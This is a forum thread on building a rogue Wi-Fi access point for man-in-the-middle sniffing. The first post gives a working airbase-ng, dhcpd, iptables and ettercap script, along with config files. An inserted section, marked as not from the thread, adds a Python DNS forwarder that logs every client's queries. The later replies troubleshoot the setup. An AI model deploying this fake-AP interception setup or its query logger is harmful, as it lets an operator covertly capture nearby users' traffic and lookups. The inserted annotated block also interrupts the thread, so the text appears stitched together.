
Thread: rogue AP + MITM + DNS problems

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default rogue AP + MITM + DNS problems

    I'd like to start by clarifying that I am doing this as a learning experience. I had it working fine following the tutorial in the HowTo section, but I am unsure how to integrate a DNS server. Here are the relevant files, or at least my attempt.

    /etc/dhcp3/dhcpd.conf
    Code:
    ddns-update-style none;
    log-facility local7;
    # clients on the AP side get an address from this range, with the AP itself (10.0.0.1)
    # as both their DNS server and their default gateway
    subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
      option domain-name-servers 10.0.0.1;
      option routers 10.0.0.1;
      default-lease-time 600;
      max-lease-time 7200;
    }
    /etc/default/dhcp3-server - has the right interface specified

    /etc/network/interfaces
    Code:
    auto lo eth1
    iface eth1 inet dhcp
    iface lo inet loopback
    /etc/bind/named.conf.options
    Code:
    options {
      directory "/var/cache/bind";
      # upstream resolvers; each address in the list needs its own trailing semicolon
      forwarders { 208.67.222.222; 208.67.220.220; };
      auth-nxdomain no;
      listen-on-v6 { any; };
    };
    The commands I have in a script to run:
    Code:
    #!/bin/bash
    # tear down anything left over from a previous run
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcp3-server dhcpd wireshark ettercap airbase-ng
    airmon-ng stop eth1
    ifconfig eth1 down
    # put the wireless card into monitor mode and start the soft AP;
    # airbase-ng stays in the foreground, so background it or nothing below ever runs,
    # and give it a moment to create the at0 tap interface
    airmon-ng start eth1
    airbase-ng -e "ESSID" -P -C 30 -v eth1 &
    sleep 3
    # at0 is the AP side: this is the gateway/DNS address that dhcpd.conf hands out
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    # redundant (ifconfig already added the connected route for 10.0.0.0/24), harmless
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    # reset iptables and masquerade everything that leaves through eth0, the uplink
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    # note: dhcpd is killed at the top and never restarted by this script; start it on at0
    # once the address is up (e.g. /etc/init.d/dhcp3-server start) and make sure named is running
    # sniff on the AP side; -p skips promiscuous mode, which is fine since clients send everything to the gateway
    ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    See any problems? Could having dhcp, dns, airbase-ng, and ettercap be too much for this box?
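
The DNS part of the setup above, as an added worked example that is not code from this thread or from BIND: a small logging forwarder that plays the role named.conf.options gives to BIND. It listens on the address the dhcpd.conf hands out as DNS (10.0.0.1 on at0), prints every query a client sends, relays it to the first forwarder from the post (208.67.222.222), checks that the reply carries the same transaction id, and passes the answer back. The listen address and upstream come from the post; the 3-second upstream timeout, the transaction-id check, and the 192.0.2.1 address used in the test are assumptions or constructed data. Stop named first, or bind another port, since both cannot own 10.0.0.1:53.

```python
#!/usr/bin/env python3
"""Logging DNS forwarder for the rogue-AP lab (added example, not code from the thread).

Stands in for the BIND forwarder in the original post: listens on the address the DHCP
server hands out as DNS, logs each client query, relays it upstream and returns the answer.
"""
import socket
import struct

LISTEN_ADDR = ("10.0.0.1", 53)      # gateway/DNS address from the post's dhcpd.conf
UPSTREAM = ("208.67.222.222", 53)   # first forwarder from the post's named.conf.options
UPSTREAM_TIMEOUT = 3.0              # seconds to wait for the upstream answer (assumption)
A_RECORD = 1


def parse_name(packet, offset):
    """Decode a DNS name at offset; returns (dotted name, offset just past it).
    Follows compression pointers (RFC 1035 4.1.4) and rejects pointer loops."""
    labels, end, jumped, hops = [], offset, False, 0
    while True:
        if offset >= len(packet):
            raise ValueError("truncated name")
        length = packet[offset]
        if length & 0xC0 == 0xC0:                        # compression pointer
            if offset + 1 >= len(packet):
                raise ValueError("truncated pointer")
            if not jumped:
                end = offset + 2                         # a pointer ends the in-line name
            pointer = struct.unpack("!H", packet[offset:offset + 2])[0] & 0x3FFF
            jumped, hops, offset = True, hops + 1, pointer
            if hops > 32:
                raise ValueError("pointer loop")
            continue
        offset += 1
        if length == 0:
            if not jumped:
                end = offset
            return ".".join(labels), end
        labels.append(packet[offset:offset + length].decode("ascii", "replace"))
        offset += length


def parse_query(packet):
    """Return (txid, qname, qtype) from the first question of a DNS message."""
    if len(packet) < 12:
        raise ValueError("short header")
    txid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount == 0:
        raise ValueError("no question section")
    qname, off = parse_name(packet, 12)
    if off + 4 > len(packet):
        raise ValueError("truncated question")
    qtype, _qclass = struct.unpack("!HH", packet[off:off + 4])
    return txid, qname, qtype


def build_query(name, txid=0x1234, qtype=A_RECORD):
    """Build a recursive query for name, the same message `nslookup name server` sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.strip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def answer_ips(packet):
    """Collect the IPv4 addresses from the A records in a response's answer section."""
    _txid, _flags, qdcount, ancount = struct.unpack("!HHHH", packet[:8])
    off = 12
    for _ in range(qdcount):                  # skip the echoed question(s)
        _, off = parse_name(packet, off)
        off += 4
    ips = []
    for _ in range(ancount):
        _, off = parse_name(packet, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        rdata = packet[off:off + rdlen]
        off += rdlen
        if rtype == A_RECORD and rdlen == 4:
            ips.append(".".join(str(b) for b in rdata))
    return ips


def serve(listen=LISTEN_ADDR, upstream=UPSTREAM):
    """Receive client queries, log them, relay upstream, hand back the matching answer."""
    client_side = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client_side.bind(listen)
    upstream_side = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    upstream_side.settimeout(UPSTREAM_TIMEOUT)
    while True:
        data, client = client_side.recvfrom(4096)
        try:
            txid, qname, qtype = parse_query(data)
        except ValueError as err:
            print(f"{client[0]}: dropped malformed packet ({err})")
            continue
        print(f"{client[0]} asked for {qname} (type {qtype}, id {txid:#06x})")
        upstream_side.sendto(data, upstream)
        try:
            reply, _ = upstream_side.recvfrom(4096)
        except socket.timeout:
            print(f"  no answer from {upstream[0]} within {UPSTREAM_TIMEOUT}s")
            continue
        if reply[:2] != data[:2]:             # only return the answer to this very query
            print("  upstream reply had a different transaction id; dropped")
            continue
        print(f"  answers: {answer_ips(reply)}")
        client_side.sendto(reply, client)


if __name__ == "__main__":
    serve()
```

Run it as root on the AP box after at0 has its address; each line it prints is what ettercap or tcpdump on at0 would show for port 53, which is a quick way to confirm that clients really are sending their DNS to 10.0.0.1 before chasing the sniffer.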

  2. #2
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    What is it that doesn't work? If it's the DNS, don't you need more than those?

    Usually it's a good idea to put the basic zones in it and of course all the needed
    options, though I'm referring to ISC BIND, which might be a bit different, pal.

    Running all those together should work, as we have talked about, but that's
    just my opinion and I haven't played much with airbase-ng, though I have
    played a lot with ISC BIND and Ettercap, and DHCP (on a winbl0wz server).

    Well, I did try to find the places where I found a lot of nice info on DNS servers, but I have forgotten them :-(
    (I do have a nice and properly configured named.conf somewhere, that's for ISC BIND though.)
    "I realized, that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain." - MaXe

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default

    The DNS server is working, but the tap interface isn't, i.e. Ettercap won't sniff the traffic now O.o

  4. #4
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    Since you're acting as gateway, why not tcpdump it all?

    Make sure when you test it that there is actually traffic going through.

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default

    I'll try that, and yes, I can figure out the whole "make sure there is traffic" thing.

  6. #6
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    Great, now when you tcpdump the traffic going through you, should I say
    that you should double-check you're dumping on the right interface, the one acting as router?

    Just a heads up, I don't want to give false information. (Though I'm not 100%
    sure if the traffic just goes to you or to one specific interface, since this case
    involves multiple interfaces on one computer.)

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default

    Well, it's quite complex in the end.

    My computer has three interfaces (eth0, eth1, lo) and four IP addresses O.O

    eth0 has an external IP given by the network I'm leeching off of (my own in this case); it also has an internal IP for that LAN.
    eth1 has the same external IP (everything gets forwarded); it also has its own internal IP (10.0.0.1).
    lo has its own internal IP because it gets forwarded to eth1 as a client.

    eth1 is acting as an access point, drawing from eth0. lo is connected to it via loopback. The DNS server listens on every interface, but the only ones that will send a DNS request to 10.0.0.1 are the clients. Yet (!!) thanks to airbase, I also have a tap interface that everything gets forwarded through. O.O I should make a blueprint.

    Thanks MaXe, it seems to be working.

  8. #8
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    Quote Originally Posted by HitThemLow View Post
    Well, it's quite complex in the end.

    My computer has three interfaces (eth0, eth1, lo) and four IP addresses O.O

    eth0 has an external IP given by the network I'm leeching off of (my own in this case); it also has an internal IP for that LAN.
    eth1 has the same external IP (everything gets forwarded); it also has its own internal IP (10.0.0.1).
    lo has its own internal IP because it gets forwarded to eth1 as a client.
    I got it to 5 IPs. eth0 has 2, eth1 has 2 and lo has 1? But four unique IPs in total. Insane xD

    Quote Originally Posted by HitThemLow View Post
    eth1 is acting as an access point, drawing from eth0. lo is connected to it via loopback. The DNS server listens on every interface, but the only ones that will send a DNS request to 10.0.0.1 are the clients. Yet (!!) thanks to airbase, I also have a tap interface that everything gets forwarded through. O.O I should make a blueprint.
    Yeah, make a blueprint in MS Paint next time!

    Quote Originally Posted by HitThemLow View Post
    Thanks MaXe, it seems to be working.
    Great to hear that, man, I've been hoping for that for ages now!

  9. #9
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    Hello MaXe,
    I have a feeling 208.67.222.222; 208.67.220.220 is a copy-paste. You need to use your own ISP's. Look up what they have.

    Or you could try cat /etc/resolv.conf (guessing the IP of your router) and remove the above.

    Or try using 4.2.2.2 as a DNS server. It is "free" and works well.

    Could having dhcp, dns, airbase-ng, and ettercap be too much for this box?
    Should not be a problem if you get everything set up right. I have 3 cards running in my computer. One as a rogue AP, one for rogue transparency and the last one for surfing etc. Using an old P4.

    Best of luck with your endeavors

    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  10. #10
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    208.67.222.222 is a free public DNS server.

    To confirm that it works from your location, do:

    Code:
    nslookup virjacode.com 208.67.222.222
    (This tells nslookup to use 208.67.222.222 as the DNS server to look up virjacode.com)
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
